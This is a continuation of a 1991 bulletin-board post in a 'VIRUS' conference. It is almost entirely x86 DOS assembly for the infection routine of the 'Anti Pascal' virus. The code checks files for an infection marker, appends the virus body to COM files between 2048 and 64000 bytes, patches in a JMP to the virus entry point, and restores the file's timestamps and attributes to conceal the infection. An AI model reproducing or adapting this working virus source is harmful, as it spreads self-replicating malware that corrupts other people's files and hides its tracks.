|||
|
|
|||
|
cmp byte ptr [di+3],0CA ; File already infected?
|
|||
|
stc ; Set CF to indicate it
|
|||
|
jz quit ; Don't touch this file if so
|
|||
|
|
|||
|
mov cx,[si+offset fsize-v_const]
|
|||
|
cmp cx,2048d ; Check if file size >= 2048 bytes
|
|||
|
jb quit ; Exit if not
|
|||
|
cmp cx,64000d ; Check if file size <= 64000
|
|||
|
bytes
|
|||
|
stc ; Set CF to indicate it
|
|||
|
ja quit ; Exit if not
|
|||
|
|
|||
|
xor cx,cx ; Seek to file end
|
|||
|
xor dx,dx
|
|||
|
mov ax,4202
|
|||
|
int 21 ; Do it
|
|||
|
push ax ; Save file size on stack
|
|||
|
jc quit ; Exit on error
|
|||
|
|
|||
|
; Write the virus body after the end of file:
|
|||
|
|
|||
|
mov cx,v_end-v_start
|
|||
|
nop
|
|||
|
lea dx,[si+offset v_start-v_const]
|
|||
|
mov ah,40
|
|||
|
int 21 ; Do it
|
|||
|
jc quit ; Exit on error
|
|||
|
pop ax ; Restore file size in AX
|
|||
|
|
|||
|
; Form a new address for the first JMP instruction in AX:
|
|||
|
|
|||
|
add ax,v_entry-v_start-3
|
|||
|
mov byte ptr [di],0E9 ; JMP opcode
|
|||
|
mov [di+1],ax
|
|||
|
mov byte ptr [di+3],0CA ; Set the "file
|
|||
|
infected" sign
|
|||
|
|
|||
|
xor cx,cx ; Seek to file beginning
|
|||
|
xor dx,dx
|
|||
|
mov ax,4200
|
|||
|
int 21 ; Do it
|
|||
|
jc quit ; Exit on error
|
|||
|
|
|||
|
mov cx,4 ; Write the new first 4 bytes
|
|||
|
of the file
|
|||
|
mov dx,di
|
|||
|
mov ah,40
|
|||
|
int 21 ; Do it
|
|||
|
|
|||
|
quit:
|
|||
|
pushf ; Save flags
|
|||
|
|
|||
|
mov ax,5701 ; Set file date & time
|
|||
|
mov cx,[si+offset time-v_const] ; Get time from
|
|||
|
mydta
|
|||
|
mov dx,[si+offset date-v_const] ; Get date from
|
|||
|
mydta
|
|||
|
int 21 ; Do it
|
|||
|
|
|||
|
mov ah,3E ; Close the file
|
|||
|
int 21
|
|||
|
|
|||
|
mov ax,4301 ; Set file attributes
|
|||
|
mov cl,[si+offset attrib-v_const] ; Get them
|
|||
|
from mydta
|
|||
|
xor ch,ch
|
|||
|
|
|||
|
<ORIGINAL MESSAGE OVER 100 LINES, SPLIT IN 2 OR MORE>
|
|||
|
===========================================================================
|
|||
|
BBS: The Programmer's Inn
|
|||
|
Date: 11-24-91 (20:08) Number: 3565
|
|||
|
From: AHMED DOGAN Refer#: NONE
|
|||
|
To: ALL Recvd: NO
|
|||
|
Subj: ANTI PASCAL <CONT> Conf: (16) VIRUS
|
|||
|
---------------------------------------------------------------------------
|
|||
|
mov dx,[si+offset namaddr-v_const] ; Point to
|
|||
|
file name
|
|||
|
int 21 ; Do it
|
|||
|
|
|||
|
popf ; Restore flags
|
|||
|
ret
|
|||
|
|
|||
|
v_end equ $
|
|||
|
|
|||
|
code ends
|
|||
|
end start
|
|||
|
|
|||
|
---
|
|||
|
<EFBFBD> RonMail 1.0 <EFBFBD> Programmer's Inn - Home of FeatherNet (619)-446-4506
|